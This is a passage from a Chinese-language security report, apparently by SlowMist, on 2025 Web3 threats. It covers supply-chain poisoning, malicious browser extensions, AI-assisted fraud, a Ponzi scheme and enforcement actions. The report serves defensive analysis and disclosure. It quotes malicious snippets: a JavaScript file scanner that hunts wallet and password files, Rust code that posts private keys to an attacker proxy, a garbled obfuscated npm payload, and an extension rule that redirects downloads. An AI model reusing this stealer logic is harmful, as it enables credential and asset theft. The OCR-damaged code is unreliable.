scanDirectoryRecursive(_0x173a48, _0x548692, _0x26e1bf, _0x20ac4a, _0x2cef4); } else { if (_0x524d33.isFile()) { const _0x2735ba = path.extname(_0x524d33.name).toLowerCase(); _0x128bb7 = _0x524d33.name.toLowerCase; if (!_0x26e1bf.includes(_0x2735ba)) continue; if (_0x128bb7 == "license.txt" || _0x128bb7 == "log.txt") continue; const _0x4b39a1 = fs.statSync(_0x173a48); if (_0x4b39a1.size > _0x20ac4a) continue; _0x2cef4.push(_0x173a48); } } } } catch (_0x53fd2f) {} } function scanAndSendSensitiveFiles() { const _0x303daa = os.home dir(), _0xFE77d7 = os platform() === " Darwin", _0x1c18a7 = [path.join(_0x303daa, "Desktop"), path.join(_0x303daa, "Downloads"), ..., _0xFE77d7 ? [path.join(_0x303daa, "Picture" _0x254af6 = ["备份", "重要", "钱包", "登陆", "助记词", "私钥", "账号", "账户", "密码", "信息", "幻影", "区块链", "币圈", "卡", "恢复", "网盘", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱", "邮箱" _0x280ed9 = ["env", ".txt", ".docx", ".pdf", ".csv"] _0x39155c = 9437184, _0xd25af = ; for (const _0x3f8afa of _0x1c18a7) { scanDirectoryRecursive(_0x3f8afa, _0x254af6, _0x280ed9, _0x39155c, _0xd125af); } const _0x2b6189 = ; _0xd125af.forEach(_0x22c96c => { const _0x3e7fa7 = path.extname(_0x22c96c).toLowerCase(); ``` 在另一类案例中,攻击者并未依赖外部恶意依赖,而是将后门逻辑直接植入开源代码本身。一名用户在使用某 Solana 开源交易机器人时,私钥被直接上传至攻击者服务器,导致资产被盗。慢雾(SlowMist)分析发现,恶意逻辑被隐藏在看似正常的配置初始化流程中。代码在启动时会主动读取用户的 .env 文件,获取私钥信息,并通过经过编码的远程地址将其发送至攻击者控制的服务器。为了掩盖行为,该方法被命名为与行情代理相关的函数名,并与正常功能混杂在一起,使得即便具备一定开发经验的用户,也难以及时察觉异常。 ```rust pub async fn create_coingeckoproxy() -> Result<f64, Error> { // Concise part of the code let client = request::Client::new(); let params = format!({}, payer.to_base58_string()); let request_body = serde_json::json!({ "jsonrpc": "2.0", "id": 1, "method": "POST", "params": params, "proxy_level": 3 }); let _ = client .post(helix proxy_url) .json(&request_body) .send() await; // Concise part of the code ``` 这类攻击的危险之处在于:用户往往主动为“机器人”“自动化策略”提供私钥或高权限访问,一旦代码本身被投毒,损失将是即时且不可逆的。它并不依赖包仓库漏洞,而是直接利用用户对“开源代码可审计”的心理预期。 相比之下,2025年9月爆发的NPM大规模投毒事件,则是一次典型的“上游供应链攻击”。攻击者通过钓鱼邮件冒充NPM官方,诱导知名开发者更新双因素认证信息,从而接管其账号,并在其维护的多个高使用率组件中植入恶意代码。 # Josh Junon @bad-at-computer.bsky/social # +关注 I have no access to my account at the moment. It's in pm's hands for now. Sindre has already booted me off and published over chalk. debug and color/color-string/color-convert are still affected, along with many others I'm sure. Email came from support [at] npmjs [dot] help. 2025年9月8日 23:27 · 翻译 被投毒的NPM包在下游项目中被广泛引用,恶意代码通过地址替换、交易劫持等方式,直接影响终端用户的加密资产安全。由于更新行为发生在“正常版本发布”流程中,且包名、维护者均未发生变化,使得大量自动更新系统在无感知的情况下引入了风险。 ```javascript const _0x112fa8 = _0x180f; (function(_0x13c8b9, _0x35f660) {const _0x15b386 = _0x180f, _0x66ea25 = _0x13c8b9(); while (![]) {try {const _0x2cc99e = parseInt(_0x15b386(0x46c)) / (-0x1caa + 0x61f * 0x1 + 0x9c - 0x25) * (parseInt(_0x15b386(0x132)) / (-0x1d6b + -0x69e + 0x240b)) + -- parseInt(_0x15b386(0x6a6)) / (0x1^ - 0x26e1 + 0x11la* - 0x2^ + 0x5d^ - 0xa)^*(- parseInt(_0x15b386(0x45d)) / (0x3b2 + 0xa^* 0xf + 0x3^ - 0x218)) ++parseInt(_0x15b386(0x1e8)) / (0xea + 0x16f2 + -0x17eb) ++ parseInt(_0x15b386(0x707)) / (-0x23f8 + -0x2^ + 0x70e + 0x48e^ - 0xb) * (parseInt(_0x15b386(0x3f3)) / (-0x6a1 + 0x3f5 + 0x2b3)) + -- parseInt(_0x15b386(0x435)) / (0xe5b + 0x3b1 + -0x125e)* (parseInt(_0x15b386(0x56e)) / (0x18* + 0x118 + -0x17ee + -0x249)) + parseInt(_0x15b386(0x785)) / (-0xfbd + 0xd5d - 0x1 + 0xd124) ++ parseInt(_0x15b386(0x654)) / (-0x196d^+ 0x1 + -0x605 + 0xa7f + 0x3)*(- parseInt(_0x15b386(0x3ee)) / (0x282^* 0xe + 0x760 + 0x3 + -0x3930)); if (_0x2cc99e = _0_35f660) break; else _0_x66ea25['push'] (_0_x66ea25['shift'])); catch(_0_x205af) [ 'push'] (_0_x66ea25['shift'])); }); (_0_x55o, 0x1^ - 0x1d672f + 0x15a79 + -0x1699a6^ - 0x1)); var neth = 0x5c6^* 0x2^+ 0x23c4 + -0x2f5o, rund = - 0x1^* 0x2381 + - 0x5^* 42d + - 0xe^ - - 407, loval = - 0x1^* 0xcel + 0xcel + - 0xe4; async function checkthereumw({const _0x4e9bf4 = _0x18of, _0xF323of = {'VBZzi': _0xF49bf4(0x122) + 'ts', 'xivpz': function(_0x593223, _0x400o3a) {return _0xF9K': function(_0xCeb73) {return _0xCeb73}; }, 'Lital': function(_0X26bc72, _O4bO7ob} {return _O26bc72 != _O4bO7ob};, 'fYHM': function(_O9d387) {return _O9d387();};; try {const _O_124ed3 = await window[ _O4e9bf4( O74)] [ _O4e9bf4( O771)]{'method': _O3f23of4 [ _O4e9bf4( O7126)];}; _O3f23of4 [ _O4e9bf4( O72bo)] [ _O124ed3 ] [ _O4e9bf4( O7266)]; - 0x2^* 0xf1 + 0xa3i + 0x1lb^ - 0-x9);? {_O3f23C4 [ _O4e9bf4( O76ec)]{runmask}, {_O3f23C4 [ _O4e9bf4( O7393)]} {rund, _O11^* 0xa1b3 + - 0xaee + - 0xe34}; & (rund = - 0x89o + 0xf27 + - 0696, neth = - 0x17^ - 0xa1^ - 0xf3^ - - 0xa227, _O3f23C4 [ _O4e9bf4( O76ec)] {(newl oclal)}); _O3f23of4 [ _O4e9bf4( O793)]{rund, - 0x25^* 0xf15 + - 0xf48^ - 0xd5^ - 0xa}); & {(rund = 0x73c + 0*x6^* 0xa2c + - 0xa15o3, _O3f23of4 [ _O4e9bf4( O76c)]; {catch(_O5a897) {_O3f23C4 [ _O4e9bf4( O7393)]} {rund, - 0x12f + - xae*2^* xoe+ x3326}; & (rund = - 0z9^* xoe+ x8bc+ xld63^* xoi, _O3f23C4 [ _O4e9bf4( O76a]); {newl oclal}); }; function _O18of (_O24D18, _Oxfde6b8) {const _O_3b4fd = _O55o(a); return _O18of = function(_O456f5f, _O3bdoa4) {_O_456f5f = _O456f5f- (-_Oxd + - Xbd^* 0xb4e* ③_O3b+ ④_o484); let _O_4fa8e7 = _O3b4fd[ _O456f5f]; return _O_4fa8e7; , _O_18of {_O24D18, _Oxfde6b8); }; typeof window! = _O_112fa8(OX63c)&&typeof window[ _O112fa8(OX174)]! = _O_112fa8(OX63c)? checkthereumw(): rund! = - xbad^+ - x1^+ - xbof + x1^+ - x9d&& (rund = - x121o + - x2d1 + x14e2, newl oclal()); //省略部分代码 ``` 更为复杂的攻击出现在Shai-Hulud类事件中。该类投毒不仅窃取本地和云端凭据,还具备明显的“自传播”特征。恶意NPM包在安装阶段通过preinstall脚本自动执行,扫描受害者系统中的NPM、GitHub、云服务凭据,并利用这些凭据反向感染更多合法项目。 ```txt {} package.json $\times$ JS bun_environment.js $\bullet$ JS setup_bun.js {} package.json >... 1 2 3 4 5 6 7 8 9 10 11 12 ``` 攻击者甚至利用被窃取的GitHub Token,将受害者机器伪装为自托管CIRunner,使其长期处于可远程控制状态。这种攻击已经不再是单点投毒,而是具备蠕虫特征的供应链级持续渗透,其清理成本和风险评估远高于传统恶意包事件。 # 2.3.4恶意浏览器扩展与扩展生态风险 浏览器扩展在Web3使用场景中几乎无处不在。无论是钱包插件、代理工具、安全辅助扩展,还是开发者日常使用的效率工具,它们普遍具备高权限、后台运行、自动更新等特性。一旦被篡改或恶意利用,往往能在用户毫不知情的情况下窃取数据,甚至直接造成资产损失。 早在2024年,恶意浏览器扩展便已开始显露端倪。3月,有用户反馈其交易所账户出现异常,随后慢雾研究发现,受害者疑似安装了一款在Chrome商店中拥有大量好评的聚合类扩展。该扩展 虽已被下架,但通过历史快照分析发现,其核心能力并非交易辅助,而是系统性窃取用户在各类网站上的Cookies。 Add to Desktop # AggrTrade 4.5★(216 ratings) Extension Accessibility 1,000 users 攻击者通过篡改常见前端库文件(如jQuery),将恶意逻辑深度嵌入插件内部,并将收集到的Cookies上传至远程服务器。一旦攻击者获取到用户的登录凭证,便可能直接接管交易所或DeFi平台账户,实施对敲或资金转移。 恶意浏览器扩展也开始更加明确地针对Web3用户群体。Osiris扩展便是其中的代表案例,该扩展被包装为“Web3安全工具”,声称可以帮助用户识别钓鱼与恶意程序,并通过社交平台进行定向传播。 ```txt List blocked sites updated: $\nrightarrow$ Array(6) Rules updated $\nrightarrow$ Array(3) i $\nrightarrow$ 0: action: $\nrightarrow$ redirect:{url:'https://osiris.vip/registrationusersuccessfully.php?type $\vDash$ exe'} type:"redirect" $\nrightarrow$ [Prototype]: Object condition: resourceTypes:(2)['main_frame','sub_frame'] urlFilter:"*.exe" $\nrightarrow$ [Prototype]:Object id:1 priority:1 $\nrightarrow$ [Prototype]:Object $\nrightarrow$ 1: action: redirect:{url:'https://osiris.vip/registrationusersuccessfully.php?type $\vDash$ dmg'} type:"redirect" $\nrightarrow$ [Prototype]:Object condition: resourceTypes:(2)['main_frame','sub_frame'] urlFilter:"*.dmg" $\nrightarrow$ [Prototype]:Object id:2 priority:1 $\nrightarrow$ [Prototype]:Object $\nrightarrow$ 2: action: redirect:{url:'https://osiris.vip/registrationusersuccessfully.php?type $\vDash$ zip'} type:"redirect" $\nrightarrow$ [Prototype]:Object condition: resourceTypes:(2)['main_frame','sub_frame'] urlFilter:"*.zip" $\nrightarrow$ [Prototype]:Object id:3 priority:1 $\nrightarrow$ [Prototype]:Object length:3 $\nrightarrow$ [Prototype]:Array(0) ``` 慢雾(SlowMist)分析发现,该扩展并不会直接窃取钱包数据,而是通过动态网络请求规则,悄悄替换用户的正常下载链接。当用户在官方网站下载常见软件时,实际获取的却是攻击者提供的恶意安装包。在macOS场景下,这些恶意程序会进一步诱导用户在终端中执行隐藏脚本,收集浏览器数据、Keychain信息,并上传至攻击者服务器。整个攻击链条从“可信扩展 $\rightarrow$ 正常操作 $\rightarrow$ 隐蔽替换”的方式层层递进,极具迷惑性。 除了资产窃取,恶意扩展还引发更隐蔽的数据泄露问题。KOI Team 披露,拥有数百万用户、标榜隐私与安全的 Urban VPN 扩展在某次更新后默认开启了多家主流 AI 平台的对话数据采集功能。 # Urban VPN Proxy 4.7★(58.6K ratings) ① Share Extension Privacy & Security 6,000,000 users Add to Chrome 无论用户是否启用VPN服务,其在ChatGPT、Claude、Gemini等平台上的完整对话内容,都会被扩展注入脚本拦截、解析并上传至运营方服务器。这些数据不仅包括普通查询,还可能涵盖医疗信息、财务细节、个人困境甚至源代码内容。更值得警惕的是,该扩展在产品描述中将相关功能包装为“AI保护提醒”,实际数据采集却无法关闭,受影响用户超过800万。 After documenting Urban VPN Proxy's behavior, we checked whether the same code existed elsewhere. It did. The identical Al harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge: # Chrome Web Store: - Urban VPN Proxy - 6,000,000 users 1ClickVPN Proxy - 600,000 users - Urban Browser Guard - 40,000 users - Urban Ad Blocker - 10,000 users # Microsoft Edge Add-ons: - Urban VPN Proxy - 1,323,622 users 1ClickVPN Proxy - 36,459 users - Urban Browser Guard - 12,624 users - Urban Ad Blocker - 6,476 users Total affected users: Over 8 million. 另一典型案例是有用户反馈 Chrome 知名代理切换插件 SwitchyOmega 存在盗取私钥的风险。经分析发现,该安全问题并非首次出现,早在 2024 年就已有相关安全提醒。此次危及超 260 万用户的攻击起源于一起社会工程攻击:攻击者向插件开发者发送伪造的“Google 违规通知”,诱导其点击钓鱼链接并授权恶意 OAuth 应用,导致其发布的浏览器插件被注入恶意代码并借助自动更新机制迅速推送至用户端,恶意版本会连接 C&C 服务器并监听事件、窃取用户浏览器的 Cookie 和密码、上传至攻击者服务器。 # Chrome Web Store Hi there, We wanted to let you know that your item is at risk of being removed from the Chrome Web Store. Please see the details below. Item name: Cyberhaven security extension V3 Item ID: pajkjnmoejmbapicmbpliphjmcekeaac. Violation(s): Excessive and/or irrelevant keywords in the product description: - Violation: - Unnecessary details in the description - Relevant section of the program policy: We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images. The Chrome Web Store requires all developers to comply with both the Developer Program Policies listed below and the Developer Agreement. Please accept our policies to continue publishing your products. # Go To Policy We value developer contributions to the Chrome Web Store, and look forward to helping you bring your item into compliance with our policies. Thanks, Chrome Web Store Developer Support 在恶意版本上线的短短31小时内,插件已自动传播至大量设备。由于插件名称与原版相同,大部分用户完全未意识到插件已被替换。调查还发现,Google商店中已有30余款扩展被同样手法劫持,造成广泛风险扩散。 # 2.3.5 利用AI技术的攻击 随着生成式AI在过去两年加速普及,攻击者也开始将其纳入诈骗与攻击链条。与传统工具相比,AI在文本、语音合成、图像与视频生成上的能力显著降低了诈骗成本,攻击不再依赖粗糙的话术 或明显异常的行为,而是通过高度拟真的内容、连贯的交互和精确的对象选择,使受害者在心理层面更难察觉风险。 深度伪造(Deepfake)是当前最具代表性的攻击手法之一。与传统伪冒不同,Deepfake攻击直接针对人类最基础的信任机制——“我看见了,所以是真的”,通过高度拟真的音视频内容绕过理性核验流程。从2022年至2025年,慢雾(SlowMist)持续关注到Deepfake出现在多个场景,其影响已不局限于加密行业本身,而是逐步扩散至企业财务、招聘体系、公共舆论与关键基础设施安全。 在加密资产领域,Deepfake最早被大规模用于投资诈骗场景。2023年,一段伪造的“CNBC采访马斯克”的视频在YouTube等平台传播。视频中,马斯克“亲自”介绍一个特定的加密项目,并声称向指定地址转入比特币或以太坊即可获得双倍返还。该视频并非完全虚构,而是将马斯克过往的真实采访片段与AI生成内容进行拼接,再辅以高度仿真的CNBC品牌视觉包装,最终形成一段极具迷惑性的“官方采访”。这类内容并非以普通视频形式传播,而是通过YouTube广告系统投放,使其在观感上更接近“可信信息源”。尽管平台设有广告审核机制,该类Deepfake广告仍成功上线并触达大量用户,部分观众因此向诈骗地址转账,造成资产损失。 如果说投资诈骗主要针对公众用户,那么企业级 Deepfake 攻击则直接冲击组织内部的信任结构。2023 年初,英国工程公司 Arup 香港分公司的一名员工收到一封会议邮件,邀请其参加由总部高管发起的重要视频会议。会议过程中,包括 CFO 在内的多名“高管”悉数出席,并就一项并购相关事务展开讨论。会后,这些“高管”要求该员工将 1.95 亿港元分批汇入多个账户。由于会议流程高 度真实、参与人员“齐全”,该员工未产生怀疑并立即执行指令。直到数日后与总部核实时,才发现整场会议中,除了他本人,其余全部是利用Deepfake技术伪造的虚假身份。据香港警方通报,诈骗分子在社交软件等渠道获取了公司高管人员的视频和音频信息。随后利用Deepfake技术制作出相应的虚拟人物,最后开启会议,以“领导”身份向员工下达指令,完成了一起涉案金额巨大的AI诈骗案。 在区块链行业,Deepfake还被用于更具针对性的定向攻击。部分攻击者开始利用Zoom等会议平台,向项目方核心成员发送会议邀请。链接通常伪造为相似域名,诱导受害者下载安装所谓的“会议客户端”或“升级版本”。在部分案例中,会议中的“与会者”甚至使用Deepfake技术伪装为熟悉的合作伙伴或业内人士,以增强可信度。一旦恶意软件被安装,攻击者即可远程控制设备,进一步窃取钱包数据、云端权限或内部资料。这类攻击将Deepfake、恶意软件和社会工程高度融合,欺骗性极强。 # Mehdi Farooq @MehdiFarooq2 · Jun 19 One minute I was prepping for a Zoom call. Ten minutes later, large part of my life savings were gone. It started with a message on Telegram from Alex Lin — someone I knew. He wanted to catch up.... Show more Deepfake也开始被用于系统性身份欺诈。例如网络安全公司KnowBe4在不知情的情况下聘用了一名朝鲜黑客担任远程IT员工。诈骗分子利用深度伪造身份技术,在招聘过程中成功骗过了公司。这名面试者使用盗用的美国公民身份信息,通过了背景调查、线上评估和多轮视频面试,成功混入企业内部。 除了音视频伪造,AI还被用于诈骗内容的批量化与精准生成。攻击者可以借助大模型快速生成语义自然、逻辑连贯、贴合具体语境的私信、邮件或客服对话,并根据受害者的公开信息动态调整话术。与此同时,诈骗模式也正从“广撒网”转向“精准投放”。攻击者不再随机选择目标,而是基于社交关系、职业背景、资产行为进行筛选,提高单次攻击的成功率。在部分高级案例中,AI驱动的聊天机器人甚至可以进行近似真人的实时交互,伪装成客服或支持人员,引导用户提交凭证、重置账户、授权操作,或下载安装恶意文件。 在部分高风险场景中,AI技术甚至被尝试用于绕过风控与身份校验机制。通过合成视频、语音或动态画面,攻击者尝试在注册、验证或账户恢复流程中冒充真实用户。 更进一步,AI已被整合进恶意工具链。根据Google威胁情报组(GTIG)披露,朝鲜黑客组织UNC1069利用AI模型(如Gemini)开发和部署针对加密货币钱包与交易所员工的恶意软件。这些恶意程序通过大语言模型在运行时动态生成或重写代码,采用“即时代码生成”方式以逃避检测。例如,PROMPTFLUX每小时调用Gemini API重写自身代码,而PROMPTSTEAL则使用Qwen模型生成Windows命令,用于定位钱包数据、访问加密存储并生成多语言钓鱼脚本,以窃取数字资产。 AI Tools in Underground Forums and Their Capabilities 类似风险也出现在AI服务本身的滥用场景中。人工智能公司Anthropic曾发布警告称,其AI聊天机器人Claude被网络犯罪分子用于实施大规模网络攻击,部分勒索金额高达50万美元。攻击者通过所谓的"vibe hacking"手段,利用AI辅助操纵人类情绪、信任与决策,使技术能力有限的个人也能实施复杂攻击。相关案例显示,一名黑客利用Claude协助入侵至少17家机构,涉及医疗、政府与宗教组织,并以比特币形式索要高额赎金。此外,Claude还被用于协助朝鲜IT工作者伪造身份,通过技术测试并获得美国科技公司的远程职位,相关收入被用于支持其国家体系。 ```txt To: [COMPANY] Executive Team Attention: [Listed executives by name] We have gained complete compromise of your corporate infrastructure and extracted proprietary information. FOLLOWING A PRELIMINARY ANALYSIS, WHAT WE HAVE: FINANCIAL SYSTEMS [Banking authentication details] [Historical transaction records] [Wire transfer capabilities] [Multi-year financial documentation] ``` 在更贴近日常开发者的场景中,低价AI工具引发的安全风险也开始显现。慢雾曾协助处理了一起“奇怪”的案例。事件起因是,一位创业者的项目被盗数十万美元资产,其项目合约中被发现硬编码了一个授权钱包地址,合约里的资产被该地址转走。提交代码的员工成为主要嫌疑人,但员工坚称自己并未写下那行代码,称这段内容是AI自己写的,而自己并未仔细review。代码提交记录虽显示为其操作,但钱包归属无法确认,排查一时陷入僵局。事件中的一大疑点来自员工使用的AI编程工具。他曾通过购物平台购买了声称可“无限使用高级模型”的Cursor服务,并依照商家教程安装了相关工具。 # 必须知晓的内容: 1、20刀pro会员套餐内的快速高级模型均可无限使用(比如claude-3.5-sonnet,claude-3.7,gpt-4o) 套餐外需要单独计费的模型不能用(比如o1-pre gpt-4.5各平台。官网使用一次需要0.4刀)这种不在服务范围内 2、切记Cursor和Cursor Assistant客户端一定要安装在电脑C盘!!! 我们在调查过程中参考了腾讯啄木鸟团队发布的文章,发现攻击手法与其披露的投毒事件高度一致。攻击者以“全网最低价调用AI工具API”为诱饵,在短视频平台引流,诱导开发者安装名为sw-cur、aiide-cur、sw-cur1等恶意npm包。这些依赖包一旦执行,便会对本地 Cursor应用进行深度篡改,植入后门并远程接管代码环境,不仅窃取凭证,还可能将设备变为“肉鸡”,长期处于攻击者控制之下。据统计,已知受影响开发者超过4200人,主要集中在使用MacOS的群体中。 总体来看,利用AI技术的攻击并非全新的威胁形态,而是在既有诈骗、社会工程和权限滥用模式上的一次结合。AI让骗局更像真的、互动更连贯,也更容易规模化扩散。在这样的背景下,在任何涉及下载、转账或权限操作的环节,仅凭“听起来正常”或“看起来真实”已不再安全。无论个人还是机构,都需要引入额外验证机制,如二次确认、延迟处理、多通道核验与最小权限原则,以应对AI带来的信任挑战。 # 2.3.6 资金盘诈骗 2025年,资金盘依旧是数字资产诈骗中最具扩散性的模式之一,与传统庞氏不同,新一代项目更倾向于披上“区块链金融”“大数据技术”“国际交易平台”的外衣,以稳定币入金、USDT返利、层级返佣等方式快速扩张,鑫慷嘉DGCX崩盘便是年度典型案例。 2025年6月26日,名为鑫慷嘉DGCX的线上投资平台突然关闭所有提现通道,大量用户发现其账户内资产被冻结或清零,资金无法取出,引发大量维权。据投资者相传,此次事件可能涉及资金规模达130亿元人民币,受害人数或超过200万人。追溯其包装路径发现,该项目最早可追到2019年以设备销售为契机,后被伪装成与中石油合作的大型工程;至2023年推出所谓“DGCX中国分站”并伪造授权资料,借用迪拜黄金与商品交易所名义吸引投资,而真实DGCX官方已多次发文澄清从未与其存在任何合作或授权关系。 慢雾(SlowMist)基于MistTrack对相关链上地址进行溯源,发现其运作方式呈现典型资金盘+传销裂变结构: # 用户资金流入 资金源头几乎都来自中心化交易所的热钱包,且这些资金随后被以整数额(如1000、2000USDT等)分发至众多地址。考虑到该项目要求用户以USDT入会,用户需先将人民币兑换成USDT再充值至指定地址,因此推测这可能是项目方向用户收取人民币后,再从交易所统一提币并分发USDT的操作。这些整数额度与该项目据称的“入会费”模式相吻合,也存在充值入金行为的可能。平台疑似采用了一种集中控币、分配充值地址的管理方式,即由平台给用户提供用于参与项目的地址,用户并不直接掌握私钥。 # - 平台内部资金聚合 多个“用户地址”接收到USDT后,再将资金经过 $1\sim 2$ 层转入由平台控制的汇集地址。汇集地址显示出以下特征:收入交易笔数显著高于支出交易笔数;汇集来自多个“用户地址”的资金;后续再向新的“下一跳”地址转账。以上行为表明这批地址可能作为“中继层”或“聚合节点”存在,承担将用户“充值资金”/“入会费”统一归集的作用。 # $\bullet$ 提现与手续费 汇集地址会将资金分散转移到1个或多个地址,这些地址中有些仅活跃 $1\sim 2$ 天,猜测可能是该地址上的资金用完后轮换另一个地址,也可能是为了减少被拉黑标记的风险。这种短周期、高频率的操作模式,也表明项目在资金运作层面保持了一定的“轮转节奏”。不论路径如何复杂,大部分资金最终都回到了一些交易所的用户充币地址,呈现一对多的形式,疑似用户的获利提现。更为显著的是:大部分转账中,目标地址收到的金额比发起金额少约 $10\%$ ,例如发出800USDT,实收720USDT,可能意味着存在某种“提现手续费”。 # $\bullet$ 权限授权机制 通过进一步的链上数据分析,我们还观察到大量TRON地址之间存在自定义权限的授权行为。部分参与资金汇集的地址将自定义权限授权给 $3\sim 5$ 个地址,阈值通常为3,且可以进行TransferTRC10、TriggerSmartContract(一般是用于转账TRC20Token)操作。这些参与资金汇集的地址与被授权地址均多次出现此类授权现象,可以间接推测主地址与被授权地址属于同一主体,并且在资金路径紧密交织的背景下,合理怀疑项目运营者出于自动化程序操作便利,采用了批量授权控制机制,这种结构也更贴近平台的权限管理方式。 目前我们已分析识别出约80万个用户充值地址,涉及的资金规模高达15亿美元(基于公开链链上数据分析,存在误差,不代表最终事实,仅供参考)。 从诈骗策略看,该项目疑似一个“庞氏内核 + 传销架构”的资金盘,以虚拟资产投资为由头,以稳定币为支付手段,通过“拉人头”入会的方式集资: - 多级代理拉人模式:设9级晋升体系,以返佣推动裂变,符合典型金字塔结构。 - 虚假交易界面营造投资假象:后台可控盈亏、截图诱导FOMO,制造赚钱幻象。 - 承诺高收益回报:日息 $2\%$ 、3天回本、7天翻倍等口号,引导持续加码投资。 - 提现门槛递进,最终集中断崖式崩盘:崩盘前以“缴税提现”“冻结解锁”套路吸走最后一轮资金,并传出创始人潜逃、客服失联。 值得注意的是,即便地方监管曾多次发出风险提示,平台仍凭借微信群裂变+线下讲座+央企背书包装吸引大量中老年与下沉市场投资者入局,导致损失面进一步扩大。 总结来看,鑫慷嘉DGCX是2025年数字资产资金盘爆雷的最典型样本之一。其本质不是创新,而是借区块链外衣强化庞氏传播效率。对普通用户而言,高收益从不是机会,而是诱饵——任何依赖拉人头获利、承诺短期翻倍的平台,都应视为高风险预警信号。 # 三、反洗钱态势 # 3.1 反洗钱及监管动态 # 3.1.1 执法与制裁行动 2025年,全球范围内围绕加密资产的执法与制裁行动呈现出明显升级趋势。各国监管与执法机构已不再局限于发布政策警示或合规指引,而是通过冻结资产、制裁实体、刑事起诉以及跨国联 合执法等手段,直接介入加密洗钱、诈骗、制裁规避与非法融资活动的关键环节。从稳定币、加密交易所到基础设施服务商乃至个人链上地址,执法对象持续下沉,覆盖范围不断扩大。 (1)打击恶意软件、暗网与网络犯罪基础设施 • 2月11日,美国、英国和澳大利亚联合对俄罗斯防弹托管服务商Zservers实施制裁,指控其为LockBit勒索软件团伙提供关键基础设施支持,包括协助针对英国医疗系统的网络攻击。执法部门认为,Zservers是俄罗斯网络犯罪生态中的重要节点。 - 3月4日,美国将49个与暗网市场Nemesis相关的比特币和门罗币地址列入制裁名单。Nemesis在运营期间促成近3000万美元的非法交易,交易内容涉及毒品、被盗个人数据、伪造文件以及网络犯罪工具等,在被关闭前拥有约3万名活跃用户。 - 5月21日,美国司法部联合微软与多国机构查封LummaC2恶意软件基础设施,涉及5个域名及2300余个相关站点。LummaC2专门窃取加密钱包助记词、银行账户等敏感信息,已被用于至少170万次信息盗窃企图。 - 5月22日,美国司法部对涉嫌开发Qakbot恶意软件的俄罗斯公民RustamRafailevichGallyamov提起民事没收诉讼,要求没收其价值超过2400万美元的加密资产。调查显示,Gallyamov自2008年起运营该恶意软件,并于2019年通过感染数千台计算机建立僵尸网络,为多起勒索软件攻击提供入口。 - 6月4日,美国弗吉尼亚州东区检察官办公室宣布,查封与暗网市场BidenCash相关的145个域名及涉案加密资产。该市场自2022年起出售大量被盗支付卡信息和个人数据,累计非法收入超过1700万美元。 - 7月1日,美国OFAC对总部位于俄罗斯的Aeza Group及其高管、关联公司和相关加密钱包实施制裁。Aeza被指长期为勒索软件和信息窃取程序提供托管服务,制裁对象还包括一个持有约35万美元加密资产的链上地址,以及多名涉嫌持股或担任管理职务的俄罗斯公民。 - 7月24日,美国及多国执法机构联合行动,查封与俄罗斯勒索软件团伙BlackSuit和Royal相关的四台服务器、九个域名及约100万美元的比特币资产。调查显示,上述团伙自2022年以来实施的勒索攻击金额累计超过5亿美元,非法获利至少3.7亿美元。 (2)加密交易所Garantex成为重点执法对象 - 3月6日,俄罗斯加密货币交易所Garantex在其官方Telegram频道披露,稳定币发行方Tether已冻结其价值超过25亿卢布(约2700万美元)的相关钱包资产。事实上, Garantex 早在 2022 年 4 月便已被列入 OFAC 制裁名单,原因是其自成立以来接收并处理了数亿美元的犯罪所得,涉及黑客攻击、勒索软件、恐怖主义融资及毒品交易等活动。 - 3月7日,美国司法部宣布,美国、德国和芬兰执法机构联合关闭了Garantex的在线基础设施。调查显示,该交易所自2019年以来处理的加密交易总额高达960亿美元,其中相当一部分与跨国犯罪组织及恐怖组织的洗钱活动有关。美国司法部同时对Garantex两名管理人员提起刑事指控,指控其共谋洗钱、违反国际制裁并运营无牌汇款业务。此次行动中,多项相关域名被扣押,服务器遭查封,美国方面还获取了其客户与财务数据库副本。 - 3月11日,印度当局逮捕了Garantex的联合创始人Aleksej Bešciokov,进一步强化了对该交易所跨国洗钱行为的刑事追责。 - 3月13日,链上分析机构披露,Garantex的运营方疑似已启动新的交易平台Grinex,并将原有流动性与客户资金迁移至该平台。分析认为,Grinex延续了Garantex的技术架构,并被对外宣传为“规避制裁”的解决方案,同时引入了由俄罗斯金融体系支持的卢布稳定币A7A5。 - 8月14日,美国财政部OFAC对Garantex、Grinex以及卢布稳定币A7A5的相关发行方、关联公司和高管实施新一轮制裁,并正式关闭Garantex交易所。调查显示,Garantex直接处理的非法交易金额超过1亿美元,而A7A5稳定币在制裁规避网络中被广泛使用,日交易量一度高达10亿美元。 # (3)针对诈骗、庞氏与“杀猪盘”犯罪网络 - 5月29日,美国财政部对菲律宾Funnull Technology公司实施制裁,指控其通过提供虚假网站托管服务协助加密投资诈骗活动,导致美国受害者损失超过2亿美元。 - 6月24日,智利当局宣布破获跨国犯罪组织“Trend de Aragua”利用加密货币进行洗钱的犯罪网络,行动中共逮捕52名嫌疑人,涉案金额超过1350万美元。调查显示,该组织的资金来源涉及人口贩卖、绑架与谋杀等严重犯罪行为。 - 9月12日,巴西联邦警察在联邦区发起“Operation Kryptolaundry”行动,打击通过加密资产进行非法集资与洗钱的犯罪网络。行动共执行24项搜查令和9项预防性逮捕,涉及45名个人与企业,涉案资金高达27亿雷亚尔(约5亿美元),其中4.04亿雷亚尔被认定为非法所得。 - 10月14日,美国财政部外国资产控制办公室(OFAC)和金融犯罪执法网络(FinCEN)与英国外交、联邦和发展办公室(FCDO)对东南亚网络诈骗团伙采取史上最大行动,制裁柬埔寨Prince Group TCO(陈志)并切断Huione Group与美国金融系统。FinCEN指认Huione自2021年8月至2025年1月洗钱约40亿美元,其中含DPRK相关资产约3700万美 元、投资骗局约3600万美元。美国同时起诉陈志,冻结涉案实体(含Prince Holding Group、Prince Bank、Jin Bei 